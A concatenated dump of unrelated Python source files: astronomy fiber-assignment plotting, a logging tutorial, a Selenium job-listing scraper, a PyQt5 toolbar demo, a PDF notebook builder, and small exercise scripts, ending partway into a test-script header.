theta_arm[lid], phi,\n phi_arm[lid], color=color, linewidth=linewidth\n )\n return\n\n\nplot_assignment_tile_file_hw = None\n\n\ndef plot_assignment_tile_file_initialize(hw):\n global plot_assignment_tile_file_hw\n plot_assignment_tile_file_hw = hw\n return\n\n\ndef plot_assignment_tile_file(locs, real_shapes, params):\n (tile_id, tile_ra, tile_dec, tile_theta, infile, outfile) = params\n set_matplotlib_pdf_backend()\n log = Logger.get()\n\n if os.path.isfile(outfile):\n log.info(\"Skipping existing plot {}\".format(outfile))\n return\n else:\n log.info(\"Creating {}\".format(outfile))\n\n header, fiber_data, targets_data, avail_data, gfa_data = \\\n read_assignment_fits_tile((tile_id, infile))\n\n tavail = avail_table_to_dict(avail_data)\n\n log.debug(\" tile {} at RA/DEC {} / {} with rotation {}\".format(\n tile_id, tile_ra, tile_dec, tile_theta)\n )\n\n fig = plt.figure(figsize=(12, 12))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_aspect(\"equal\")\n\n # Target properties (x, y, color) for plotting\n tgs = Targets()\n if \"FA_SURV\" in header:\n load_target_table(tgs, targets_data,\n survey=str(header[\"FA_SURV\"]).rstrip(),\n typecol=\"FA_TYPE\")\n else:\n load_target_table(tgs, targets_data)\n\n targetprops = plot_tile_targets_props(plot_assignment_tile_file_hw,\n tile_ra, tile_dec, tile_theta, tgs)\n\n log.debug(\" tile {} has {} targets with properties\"\n .format(tile_id, len(targets_data)))\n\n # When plotting available targets, we only consider those which have\n # RA/DEC information. Depending on how the assignment was written out,\n # this might include only assigned targets or all targets available to\n # the tile.\n\n # Available targets for our selected fibers.\n avtg_locs = [f for f in locs if f in tavail]\n avtg_ids = np.unique([x for f in avtg_locs for x in tavail[f]])\n\n # Downselect to include only targets with properties in the file.\n avtg = avtg_ids[np.isin(avtg_ids, targets_data[\"TARGETID\"],\n assume_unique=True)]\n\n plot_available(ax, targetprops, avtg, linewidth=0.1)\n\n # Assigned targets for our selected fibers\n tassign = {x[\"LOCATION\"]: x[\"TARGETID\"] for x in fiber_data\n if (x[\"LOCATION\"] in locs)}\n\n log.debug(\" tile {} plotting {} assigned fibers\"\n .format(tile_id, len(tassign)))\n\n fassign = {f: tassign[f] if f in tassign else -1 for f in locs}\n\n plot_assignment(ax, plot_assignment_tile_file_hw, targetprops, fassign,\n linewidth=0.1, real_shapes=real_shapes)\n\n ax.set_xlabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n ax.set_ylabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n plt.savefig(outfile, dpi=300, format=\"pdf\")\n plt.close()\n return\n\n\ndef plot_tiles(hw, tiles, result_dir=\".\", result_prefix=\"fiberassign-\",\n result_split_dir=False, plot_dir=\".\",\n plot_prefix=\"fiberassign-\",\n plot_split_dir=False, petals=None, real_shapes=False,\n serial=False):\n \"\"\"Plot assignment output.\n\n Args:\n hw (Hardware): the hardware description.\n tiles (Tiles): a Tiles object.\n result_dir (str): Top-level directory of fiberassign results.\n result_prefix (str): Prefix of each per-tile file name.\n result_split_dir (bool): Results are in split tile directories.\n plot_dir (str): Top-level directory for plots.\n plot_prefix (str): Prefix of each per-tile output file name.\n plot_split_dir (bool): Write outputs in split tile directories.\n petals (list): List of petals to plot.\n real_shapes (bool): If True, plot the full positioner shapes.\n serial (bool): If True, disable use of multiprocessing.\n\n Returns:\n None.\n\n \"\"\"\n log = Logger.get()\n\n foundtiles = result_tiles(dir=result_dir, prefix=result_prefix)\n\n log.info(\"Found {} fiberassign tile files\".format(len(foundtiles)))\n\n locs = None\n if petals is None:\n locs = [x for x in hw.locations]\n else:\n locs = list()\n for p in petals:\n locs.extend([x for x in hw.petal_locations[p]])\n locs = np.array(locs)\n\n plot_tile = partial(plot_assignment_tile_file, locs, real_shapes)\n\n tiles_id = tiles.id\n tiles_order = tiles.order\n tiles_ra = tiles.ra\n tiles_dec = tiles.dec\n tiles_theta = tiles.obstheta\n\n avail_tiles = np.array(tiles_id)\n select_tiles = [x for x in foundtiles if x in avail_tiles]\n\n tile_map_list = [(x, tiles_ra[tiles_order[x]], tiles_dec[tiles_order[x]],\n tiles_theta[tiles_order[x]],\n result_path(x, dir=result_dir, prefix=result_prefix,\n split=result_split_dir),\n result_path(x, dir=plot_dir, prefix=plot_prefix,\n ext=\"pdf\", create=True,\n split=plot_split_dir))\n for x in select_tiles]\n\n log.info(\"Selecting {} fiberassign tile files\".format(len(tile_map_list)))\n\n if serial:\n plot_assignment_tile_file_initialize(hw)\n for params in tile_map_list:\n plot_tile(params)\n else:\n with mp.Pool(processes=default_mp_proc,\n initializer=plot_assignment_tile_file_initialize,\n initargs=(hw,)) as pool:\n pool.map(plot_tile, tile_map_list)\n\n return\n\n\ndef plot_assignment_tile(hw, tgs, tile_id, tile_ra, tile_dec, tile_theta,\n tile_assign, tile_avail=None, petals=None,\n real_shapes=False, outfile=None, figsize=8):\n set_matplotlib_pdf_backend()\n # Get selected fibers\n locs = None\n if petals is None:\n locs = [x for x in hw.locations]\n else:\n locs = list()\n for p in petals:\n locs.extend([x for x in hw.petal_locations[p]])\n locs = np.array(locs)\n\n # Available targets for our selected fibers.\n avtg_locs = None\n avtg_ids = None\n if tile_avail is None:\n # Just plot assigned targets\n avtg_locs = [f for f in locs if f in tile_assign]\n avtg_ids = [tile_assign[f] for f in avtg_locs]\n else:\n # Plot all available targets\n avtg_locs = [f for f in locs if f in tile_avail]\n avtg_ids = np.unique([x for f in avtg_locs for x in tile_avail[f]])\n\n # Target properties\n targetprops = plot_tile_targets_props(hw, tile_ra, tile_dec, tile_theta,\n tgs, avail_tgid=avtg_ids)\n\n fig = plt.figure(figsize=(figsize, figsize))\n ax = fig.add_subplot(1, 1, 1)\n ax.set_aspect(\"equal\")\n\n plot_available(ax, targetprops, avtg_ids, linewidth=0.1)\n\n # Assigned targets for our selected fibers\n tassign = {x: tile_assign[x] for x in locs if x in tile_assign}\n\n fassign = {f: tassign[f] if f in tassign else -1 for f in locs}\n\n plot_assignment(ax, hw, targetprops, fassign,\n linewidth=0.1, real_shapes=real_shapes)\n\n ax.set_xlabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n ax.set_ylabel(\"Curved Focal Surface Millimeters\", fontsize=\"large\")\n if outfile is None:\n plt.show()\n else:\n plt.savefig(outfile, dpi=300, format=\"pdf\")\n plt.close()\n return\n\n\ndef plot_qa_tile_color(desired, value, incr):\n des_color = \"green\"\n low_one_color = \"gold\"\n low_two_color = \"red\"\n low_color = \"black\"\n high_color = \"cyan\"\n if value == desired:\n return des_color\n if value > desired:\n return high_color\n if value < (desired - 2 * incr):\n return low_color\n if value < (desired - incr):\n return low_two_color\n return low_one_color\n\n\ndef plot_qa(data, outroot, outformat=\"pdf\", labels=False):\n \"\"\"Make plots of QA data.\n \"\"\"\n set_matplotlib_pdf_backend()\n # Imported here, to ensure that the backend has been set.\n from matplotlib.patches import Patch\n\n hw = load_hardware()\n tile_radius = hw.focalplane_radius_deg\n\n fontpt = 1\n linewidth = 0.1\n\n fig = plt.figure(figsize=(12, 10))\n\n plot_param = [\n (\"Total Fibers Assigned Per Tile\", [\"assign_total\"], 5000, 5),\n (\"Standards Assigned Per Tile\", [\"assign_std\"], 100, 2),\n (\"Sky Assigned Per Tile\", [\"assign_sky\", \"assign_suppsky\"], 400, 2),\n ]\n\n pindx = 1\n for title, key, desired, incr in plot_param:\n ax = fig.add_subplot(3, 1, pindx)\n ax.set_aspect(\"equal\")\n xmin = 360.0\n xmax = 0.0\n ymin = 90.0\n ymax = -90.0\n for tid, props in data.items():\n xcent = props[\"tile_ra\"]\n ycent = props[\"tile_dec\"]\n if xcent > xmax:\n xmax = xcent\n if xcent < xmin:\n xmin = xcent\n if ycent > ymax:\n ymax = ycent\n if ycent < ymin:\n ymin = ycent\n keytot = np.sum([props[x] for x in key])\n color = plot_qa_tile_color(desired, keytot, incr)\n circ = plt.Circle((xcent, ycent), radius=tile_radius, fc=\"none\",\n ec=color, linewidth=linewidth)\n ax.add_artist(circ)\n if labels:\n ax.text(xcent, ycent, \"{}\".format(tid),\n color=color, fontsize=fontpt,\n horizontalalignment='center',\n verticalalignment='center',\n bbox=None)\n\n margin = 1.1 * tile_radius\n\n xmin -= margin\n xmax += margin\n ymin -= margin\n ymax += margin\n if xmin < 0.0:\n xmin = 0.0\n if xmax > 360.0:\n xmax = 360.0\n if ymin < -90.0:\n ymin = -90.0\n if ymax > 90.0:\n ymax = 90.0\n\n ax.set_xlim(left=xmin, right=xmax)\n ax.set_ylim(bottom=ymin, top=ymax)\n ax.set_xlabel(\"RA (degrees)\", fontsize=\"large\")\n ax.set_ylabel(\"DEC (degrees)\", fontsize=\"large\")\n ax.set_title(title)\n\n c_high = plot_qa_tile_color(desired, desired+1, incr)\n c_exact = plot_qa_tile_color(desired, desired, incr)\n c_low_one = plot_qa_tile_color(desired, desired-incr, incr)\n c_low_two = plot_qa_tile_color(desired, desired-2*incr, incr)\n c_low = plot_qa_tile_color(desired, 0, incr)\n\n c_low_two_val = desired - incr\n c_low_val = desired - 2 * incr\n\n legend_elements = [\n Patch(facecolor=c_high, edgecolor=\"none\",\n label=\"> {} assigned\".format(desired)),\n Patch(facecolor=c_exact, edgecolor=\"none\",\n label=\"Exactly {} assigned\".format(desired)),\n Patch(facecolor=c_low_one, edgecolor=\"none\",\n label=\"< {} assigned\".format(desired)),\n Patch(facecolor=c_low_two, edgecolor=\"none\",\n label=\"< {} assigned\".format(c_low_two_val)),\n Patch(facecolor=c_low, edgecolor=\"none\",\n label=\"< {} assigned\".format(c_low_val)),\n ]\n ax.legend(handles=legend_elements, loc=\"best\",\n fontsize=\"x-small\")\n pindx += 1\n\n outfile = \"{}.{}\".format(outroot, outformat)\n plt.savefig(outfile, dpi=300, format=\"pdf\")\n\n return\n","sub_path":"py/fiberassign/vis.py","file_name":"vis.py","file_ext":"py","file_size_in_byte":22709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"165314000","text":"import logging\n\nlogging.basicConfig(\n level=logging.WARNING,\n format='[%(asctime).19s] [%(levelname)s] %(message)s',\n)\n\nlog = logging.getLogger(__name__)\n\n# logging.critical('Błąd Krytyczny')\n# logging.error('Bład')\n# logging.warning('Uwaga')\n# logging.info('Informacja')\n# logging.debug('Debug')\n\n\nlogging.warning('Rozpoczynam program')\n\nlogging.info('Teraz będzie sekcja odnośnie wyświeltnia napisów')\n\n\ndef wyswietlanie_napisow(tekst):\n wynik = (tekst + ', ') * 5\n logging.debug('Zmienne lokalne: %s' % locals())\n logging.info('wynik: %s' % wynik)\n logging.debug('Wychodzę z funkcji')\n return wynik\n\n\nwyswietlanie_napisow('Hello Wold')\n\nlogging.warning('Kończę program')\n\n\ndef asd():\n import warnings\n warnings.warn('Uważaj, z tego już nie korzystaj', PendingDeprecationWarning)\n\n\nasd()\n","sub_path":"bin/podstawy/logownaie.py","file_name":"logownaie.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"282448715","text":"import pandas as pd\r\nimport math\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport time\r\nfrom selenium.common.exceptions import NoSuchElementException, InvalidSessionIdException\r\nfrom selenium.webdriver import ActionChains\r\n\r\n# ================================사용자 직접 검색 시 필요=====================================\r\n\r\n# search_data = input('검색어를 입력해주세요: ') # 사용자한테 검색어 받을 경우 활성화\r\n\r\n# ================================= 검색 진행 ================================================\r\n\r\nurl = 'https://www.saramin.co.kr/zf_user/' # 메인페이지\r\ndriver = webdriver.Chrome('chromedriver.exe')\r\ndriver.get(url) # 메인페이지 호출\r\n\r\ntry:\r\n WebDriverWait(driver,5).until(\r\n EC.presence_of_all_elements_located((By.ID, 'search_open'))) # 메인페이지 로딩 대기 - 검색창\r\n\r\nexcept Exception as e:\r\n print(e, '페이지 로딩시간 초과')\r\n driver.close()\r\n\r\ntime.sleep(1)\r\ndriver.find_element_by_id('search_open').click() # 검색창 활성화\r\ndriver.find_element_by_id('ipt_keyword_recruit').clear() # 검색창 기본문구 제거\r\n\r\n# driver.find_element_by_id('ipt_keyword_recruit').send_keys(search_data) # 검색값 입력 (사용자 직접 검색 시 필요)\r\n\r\ntime.sleep(1)\r\nsearch_key = 'C++'\r\ndriver.find_element_by_id('ipt_keyword_recruit').send_keys(search_key) # 검색 key 전달\r\ndriver.find_element_by_css_selector('button#btn_search_recruit').click() # 검색버튼 클릭\r\n\r\n# ================================= 검색 완료 후 페이지 로딩 및 채용정보 유무 확인 ==============\r\n\r\ntry:\r\n WebDriverWait(driver,5).until(\r\n EC.presence_of_all_elements_located((By.ID, 'recruit_info_list'))) # 검색페이지 로딩 대기\r\n error = ' '\r\nexcept Exception as e:\r\n error = f'{search_key}(으)로 수집할 채용정보가 없습니다.'\r\n print(error)\r\n\r\ntime.sleep(1)\r\n\r\nif '채용정보' in error: # 채용정보가 없는 경우 에러처리\r\n pass\r\nelse:\r\n try:\r\n driver.find_element_by_css_selector('#content > ul.tab_search_result.on > li:nth-child(2) > a').click() # 채용정보탭 클릭\r\n\r\n except NoSuchElementException as e:\r\n print(f'{search_key}(으)로 수집할 채용정보가 없습니다.')\r\n\r\n\r\n\r\n # ===================================채용 정보 총 건수 추출===============================================\r\n\r\n time.sleep(2)\r\n try:\r\n total = int(driver.find_element_by_css_selector('span.cnt_result').text[2:-1].replace(',','')) # 검색 총 채용정보 건수 추출\r\n total_page = math.ceil(total/40) # 총페이지수 추출 (총 채용정보 건수 / 채용정보 표현갯수)\r\n \r\n # ===================================크롤링 시작==============================================\r\n\r\n try:\r\n result = [] # 저장될 곳 초기화\r\n jobs_num = 0\r\n print(f'{\"=\"*10} {search_key} 채용정보 수집시작 {\"=\"*10}')\r\n for page in range(1,total_page+1): # 페이지수 자동 변경\r\n if page != 1: # 2페이지부터 수집\r\n driver.find_element_by_xpath(f'//a[@page={page}]').click()\r\n time.sleep(2)\r\n \r\n jobs = driver.find_elements_by_css_selector('#recruit_info_list .item_recruit') # 채용정보 리스트 추출\r\n jobs_num += len(jobs)\r\n \r\n print(f'{page} 페이지 수집중 [{page}/{total_page}][총 {jobs_num}개 수집]') # 진행 상황표시 {round(((page)/total_page),3)*100}%\r\n for i in jobs:\r\n title = i.find_element_by_css_selector('h2.job_tit').text # 채용정보 제목 추출\r\n title_ = i.find_element_by_css_selector('h2.job_tit')\r\n career = list(i.find_element_by_css_selector('div.job_condition').text.split('\\n'))[1].replace('↑','') # 경력여부\r\n station = list(i.find_element_by_css_selector('div.job_condition').text.split('\\n'))[0] # 지역명 추출\r\n date = i.find_element_by_css_selector('span.date').text.replace('~','') # 채용일시 추출\r\n company = i.find_element_by_css_selector('div.area_corp a.data_layer').text # 회사명 추출\r\n link = i.find_element_by_css_selector('a.data_layer').get_attribute('href') # 채용링크 추출\r\n work_lst = i.find_elements_by_css_selector('div.job_sector a')\r\n work_lst_2 = []\r\n for work in work_lst: # 직종데이터 분리 \r\n work_lst_2.append(work.text)\r\n machul = i.find_element_by_css_selector('div.area_corp_info') # 기업정보 탐색\r\n ActionChains(driver).move_to_element(machul).perform() # 기업정보 요소 마우스오버\r\n lst = [] # 매출액 초기화\r\n lst_1 = []# 기업주소 초기화\r\n machul_lst = machul.find_elements_by_css_selector('div.area_btn table > tbody > tr') # 기업정보 저장\r\n for i in machul_lst: # 매출액, 기업주소 추출\r\n if '매출액' in i.text:\r\n i = i.text.split()\r\n for won in i:\r\n if '억' in won or '만원' in won: # (몇년도 기준) 제거\r\n lst.append(won)\r\n\r\n elif '주소' in i.text: \r\n i = i.text.split()\r\n for gu in i:\r\n if '구' in gu and i.index(gu)!=1: # 구단위까지만 저장\r\n lst_1.append(i[1:i.index(gu)+1])\r\n break \r\n else:\r\n pass \r\n time.sleep(0.1) \r\n ActionChains(driver).move_to_element(title_).perform() # 기업정보 요소 마우스오버 초기화\r\n \r\n \r\n if len(lst) !=0 and len(lst_1) !=0:\r\n result.append([title]+[station]+[date]+[company]+[link]+[career] # 결과값 저장\r\n + [','.join(work_lst_2)] + [' '.join(lst)] + [' '.join(lst_1[0])] + [search_key])\r\n elif len(lst) ==0 and len(lst_1) !=0:\r\n result.append([title]+[station]+[date]+[company]+[link]+[career] # 결과값 저장\r\n + [','.join(work_lst_2)] + ['매출액없음'] + [' '.join(lst_1[0])] + [search_key])\r\n elif len(lst) !=0 and len(lst_1) ==0:\r\n result.append([title]+[station]+[date]+[company]+[link]+[career] # 결과값 저장\r\n + [','.join(work_lst_2)] + [' '.join(lst)] + [('주소없음')] + [search_key])\r\n print(f'{\"=\"*10} {search_key} 채용정보 수집완료 {\"=\"*10}')\r\n\r\n # ===================================크롤링 완료 후 파일 저장==============================================\r\n\r\n####################csv 저장\r\n df = pd.DataFrame(result, columns=('title','station','date',\r\n 'company','link','carrer', 'work', 'machul', 'juso', 'search_key'))\r\n df.to_csv(f'{search_key}_saramin_copy.csv')\r\n\r\n\r\n####################DB 저장\r\n # db = SaramDB()\r\n # db.saram_drop()\r\n # db.saram_create()\r\n # for i in result:\r\n # db.saram_insert(i[0],i[1],i[2],i[3])\r\n # db.db_free()\r\n # driver.close()\r\n except PermissionError as e:\r\n print(f'{search_key}_saramin.csv 이 열려있습니다. 닫고 다시 수집하세요.') # 파일이 열려있는 ���우 에러처리\r\n\r\n\r\n except InvalidSessionIdException as e:\r\n print(f'{search_key}(으)로 등록된 채용정보가 없습니다.')","sub_path":"project_2_DataAnalysis_(Saramin)/saramin_c.py","file_name":"saramin_c.py","file_ext":"py","file_size_in_byte":8213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"75455113","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwars):\n super(MainWindow, self).__init__(*args, **kwars)\n\n self.setWindowTitle('Mon bébé Marion')\n label = QLabel('22 ocotobre')\n label.setAlignment(Qt.AlignCenter)\n\n self.setCentralWidget(label)\n\n # create object tool bar\n toolbar = QToolBar('My Tool Bar')\n self.addToolBar(toolbar)\n toolbar.setIconSize(QSize(16, 16))\n # ----------\n\n button_action = QAction(QIcon('terminal.gif'),\n 'Terminal Launcher', self)\n button_action.setStatusTip('Terminal')\n button_action.triggered.connect(self.onMyToolBarClick('terminal'))\n button_action.setCheckable(True)\n toolbar.addAction(button_action)\n # ---------- Raccorci clavier\n # sur mac ctrl = cmd\n button_action.setShortcut(QKeySequence(\"Ctrl+,\"))\n # ----------\n\n # ----------\n\n toolbar.addSeparator()\n # ----------\n button_action2 = QAction(QIcon(\"bug.png\"),\n \"Bug Seaker\", self)\n button_action2.setStatusTip(\"BUG\")\n button_action2.triggered.connect(self.onMyToolBarClick)\n button_action2.setCheckable(True)\n toolbar.addAction(button_action2)\n toolbar.addWidget(QLabel(\"Hello\"))\n toolbar.addWidget(QCheckBox())\n\n self.setStatusBar(QStatusBar(self))\n\n # --------------MENU----------------\n\n menu = self.menuBar()\n\n file_menu = menu.addMenu(\"&File\")\n file_menu.addAction(button_action)\n file_menu.addSeparator()\n file_menu.addAction(button_action2)\n\n # ______SUBMENU___________\n\n sub_menu = file_menu.addMenu(\"Submenu\")\n sub_menu.addAction(button_action)\n sub_menu.addAction(button_action2)\n\n # Custom def. S will return Boolean\n\n def onMyToolBarClick(self, s):\n print('click', s)\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\n\n\nwindow.show()\n\n\n# starts event loop\napp.exec_()\n","sub_path":"tut4_toolbars.py","file_name":"tut4_toolbars.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"507198704","text":"# -*- encoding: utf-8 -*-\nimport sys\nr_input = sys.stdin.readline\n\nN, M = map(int, r_input().split()) # 미로의 크기\nmaze = [0] * M\n\nfor i in range(N): # (DP)\n input_maze = list(map(int, r_input().split()))\n maze[0] += input_maze[0]\n\n for j in range(1, M):\n maze[j] = max(maze[j-1], maze[j]) + input_maze[j]\n\nprint(maze[-1])\n","sub_path":"Algorithm/Baekjoon/11048 이동하기/11048.py","file_name":"11048.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"402516401","text":"import fitz\nfrom datetime import date,timedelta\n\nclass Page:\n def __init__(self, title=\"\",titlex=20,titley=250,titlesize=50,basepdfname=\"\",toclevel=0,links=[]):\n self.title = title \n self.linksets=[]\n self.pageno=0\n self.fitzpage=\"\"\n self.titlecol=fitz.utils.getColor(\"black\")\n self.titlesize=titlesize\n self.titlex=titlex\n self.titley=titley\n self.basepdfname=basepdfname\n self.toclevel=toclevel\n \n \n def addLinks(self,*linksets):\n for linkset in linksets:\n self.linksets.append(linkset)\n return self\n\n\n def render(self,fitzdoc):\n self.fitzpage=fitzdoc[self.pageno]\n #render outbound links\n for linkset in self.linksets:\n linkset.render(self)\n #render title\n self.fitzpage.insert_text((self.titlex,self.titley), self.title,color=self.titlecol, overlay=True,fontsize=self.titlesize)\n\n\n\n\n\nclass Links:\n #An abstract class to represent a set of outbound links.\n #\n #Primary responsibilities are:\n #1. hold the details of a set of target pages, with text labels for each link\n #2. render these links when asked on one or more source pages\n #\n #This set of links are generally logically grouped- eg\n #you might have a set of links to pages for each day of the week.\n #This set of links can be rendered on more than one page.\n def __init__(self):\n self.pages=[];\n self.labels={}\n\n\n def addLink(self,page,label):\n self.labels[page]=label\n self.pages.append(page);\n \n\nclass LinearLinks(Links):\n # Renders a set of links left to right, or top to bottom,\n # as a set of boxes, containing centered label text.\n #\n # Expects one of left / right to be passed in constructor\n # Expects one of top/bottom to be passed in constructor\n #\n # Starting from the point defined by the two elements above,\n # boxes will be laid out either from the left (if \"left\" is passed)\n # or from the right (if \"right\" is passed).\n #\n # If right is passed, it can either be expressed as an positive number,\n # in which case it is considered as an absolute x coordinate, or as\n # a negative number, in which case it is considered as an offset from\n # the right edge of the document.\n #\n # Similarly if bottom is passed and is positive, it is considered as\n # an absolute y cooridinate, but if negative it is considered as \n # an offset from the page bottom.\n #\n # The size of each box can be modified by the width and height args-\n # Note that is the label text is too large it will just not rendered\n #\n # Use flowdirection=\"right\" to choose left to right, \n # and flowdirection=\"down\" to choose top to bottom\n # The fontsize is also controllable.\n def __init__(self,width=80,height=80,left=\"\",top=\"\",right=\"\",bottom=\"\",flowdirection=\"right\",fontsize=30):\n super().__init__()\n\n self.left=left\n self.top=top\n self.right=right\n self.bottom=bottom\n self.flowdirection=flowdirection\n\n if (left==\"\" and right==\"\"):\n raise Exception(\"You must set either left or right starting points\")\n if (left!=\"\" and right!=\"\"):\n raise Exception(\"You cannot set both left and right starting points. Choose one\")\n if (top==\"\" and bottom==\"\"):\n raise Exception(\"You must set either top or bottom starting points\")\n if (top!=\"\" and bottom!=\"\"):\n raise Exception(\"You cannot set both top and bottom starting points. Choose one\")\n \n self.width=width\n self.height=height\n self.fontsize=fontsize\n\n\n # Render this set of link boxes onto the passed page\n # This method will automatically display a box as inverse color \n # if the link points back to itself.\n def render(self,page):\n if self.flowdirection==\"right\":\n\n if (self.left!=\"\"):\n l=self.left \n else:\n if (self.right <= 0): #right is expressed as negative offset from right edge\n #take the right edge, substract the passed offset, then start\n l=page.fitzpage.rect.x1+self.right -len(self.pages)*self.width\n\n r=l+self.width\n\n if (self.top!=\"\"):\n t=self.top \n else:\n if (self.bottom <= 0): #bottom is expressed as negative offset from bottom edge\n #self.bottom=page.fitzpage.rect.y1+self.bottom\n t=page.fitzpage.rect.y1+self.bottom -self.height\n b=t+self.height\n else: #flow down from top\n if (self.left!=\"\"):\n l=self.left \n else:\n if (self.right <= 0): #right is expressed as negative offset from right edge\n #take the right edge, substract the passed offset, then start\n l=page.fitzpage.rect.x1+self.right -self.width\n\n r=l+self.width\n\n if (self.top!=\"\"):\n t=self.top \n else:\n if (self.bottom <= 0): #bottom is expressed as negative offset from bottom edge\n #self.bottom=page.fitzpage.rect.y1+self.bottom\n t=page.fitzpage.rect.y1+self.bottom -self.height*len(self.pages)\n b=t+self.height\n\n\n\n\n\n boxcol=fitz.utils.getColor(\"black\")\n\n for target in self.pages :\n\n if (target.pageno==page.pageno):\n textcol=fitz.utils.getColor(\"white\")\n backcol=fitz.utils.getColor(\"black\")\n else:\n textcol=fitz.utils.getColor(\"black\")\n backcol=fitz.utils.getColor(\"white\")\n r1 = fitz.Rect(l, t, r, b)\n textrect = fitz.Rect(l, t+(self.height/2)-(self.fontsize/2*1.33), r, b)\n page.fitzpage.draw_rect(r1,color=boxcol, fill=backcol, overlay=True)\n\n if (self.flowdirection==\"right\"): \n r=r+self.width\n l=l+self.width\n else:\n t=t+self.height\n b=b+self.height\n \n\n\n linkdict = {\n \"kind\": 1,\n \"from\": r1,\n \"page\": target.pageno \n }\n page.fitzpage.insert_link(linkdict)\n\n # this line should use link text\n page.fitzpage.insert_textbox(textrect, f\"{self.labels[target]}\",color=textcol, overlay=True,align=1,fontsize=self.fontsize)\n\n\n\nclass Doc:\n # Represents the output document\n # This class exists primarily to collect the invidual pages, in the correct order.\n # As the intra pdf linking scheme relies on page number, all pages must be known\n # before links are created.\n #\n # Requires the path to a tempate pdf file when created:\n # the first page of this file will be used as the default\n # template for each page created, if the page itself does\n # not have a dedicated template.\n \n def __init__(self,basepdfname):\n self.pages=[]\n self.fitzdoc = fitz.open() \n self.basepdfname=basepdfname\n self.toc=[]\n \n def addPage( self, title=\"\",titlex=20,titley=250,titlesize=50,basepdfname=\"\",toclevel=0,links=[]):\n page=Page(title=title,titlex=titlex,titley=titley,titlesize=titlesize,basepdfname=basepdfname,toclevel=toclevel,links=links)\n self.addPages(page)\n return page\n\n # Add one or more pages into the document.\n # This method will create fitz pages for each doc, however rendering of content\n # is done as a separate pass\n def addPages(self,*pages):\n for page in pages:\n self.pages.append(page)\n page.pageno=len(self.pages)-1\n if (page.basepdfname==\"\"):\n page.basepdf=fitz.open(self.basepdfname)\n else:\n page.basepdf=fitz.open(page.basepdfname)\n #copy tempate into new doc\n self.fitzdoc.insert_pdf(page.basepdf, from_page=0, to_page=0,start_at=-1, rotate=-1, links=True, annots=True, show_progress=0, final=1)\n if page.toclevel!=0:\n self.toc.append([page.toclevel,page.title,page.pageno])\n\n \n \n\n # Ask each page to render their own conent- this is done once all pages are added\n # After rendering the document is saved.\n def render(self,outputfilename):\n for page in self.pages:\n page.render(self.fitzdoc);\n self.fitzdoc.set_toc(self.toc, collapse=1)\n self.fitzdoc.save(outputfilename)\n\n\n","sub_path":"notebook_builder.py","file_name":"notebook_builder.py","file_ext":"py","file_size_in_byte":8538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"289264736","text":"# Day old bread\r\n\r\nhow_many = float(input('How many bread do you want to buy? : '))\r\n\r\nregular_price = 3.49\r\ndiscount = 0.60\r\n\r\nresult = how_many * regular_price * discount\r\n\r\nprint(f'Regular price on your order would be: {regular_price*how_many:.2f}$ ')\r\nprint(f'Discount price is {result:.2f}$')","sub_path":"python-workbook-solutions/33.py","file_name":"33.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"211615085","text":"\nfrom random import *\nimport string\n\ndef artikelnummer():\n artikelnummeronderdeel1 = str(randint(0, 9)) + str(randint(0, 9)) + str(randint(0, 9)) + str(randint(0, 9))\n artikelnummeronderdeel2 = str(\"\".join(choice(string.ascii_lowercase) for y in range(3)))\n artikelnummeronderdeel3 = \"\".join(choice(string.ascii_lowercase) for y in range(3))\n artikelnummeronderdeel4=str(randint(0,9))+str(randint(0,9))+str(randint(0,9))+str(randint(0,9))\n x = ord(artikelnummeronderdeel2[0])\n\n if x <= 102 : \n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} microconroller \".format(artikelnummeronderdeel1, artikelnummeronderdeel2,\n artikelnummeronderdeel3, artikelnummeronderdeel4))\n elif x <= 108:\n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} Mini-pc \".format(artikelnummeronderdeel1,\n artikelnummeronderdeel2,\n artikelnummeronderdeel3,\n artikelnummeronderdeel4))\n elif x <=114 :\n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} homeautomation \".format(artikelnummeronderdeel1,\n artikelnummeronderdeel2,\n artikelnummeronderdeel3,\n artikelnummeronderdeel4))\n else:\n print(\"het nieuwe artikel nummer is : {}-{}-{}-{} accessoires \".format(artikelnummeronderdeel1,\n artikelnummeronderdeel2,\n artikelnummeronderdeel3,\n artikelnummeronderdeel4))\n\n\n\n\n return(artikelnummeronderdeel2,artikelnummeronderdeel3,artikelnummeronderdeel1,artikelnummeronderdeel4)\n\n\ni=\"\"\n\n\n","sub_path":"Uitwerkingen Opdrachten OP-1/artikel_01.py","file_name":"artikel_01.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"639920393","text":"#-*- coding: UTF-8 -*-#\n#\n#*******************************************************************************\n# apconfiguration_2.2.2.14_ONE.py\n#\n# Author: zhangjxp\n#\n# Version 1.0.0\n#\n# Copyright (c) 2004-9999 Digital China Networks Co. Ltd\n#\n# Features: \n# 2.2.2.14\t分组独立升级Abort测试1\n# 测试目的: \n# 分组手动独立升级AP image的时候,ap处于Code Transfer In 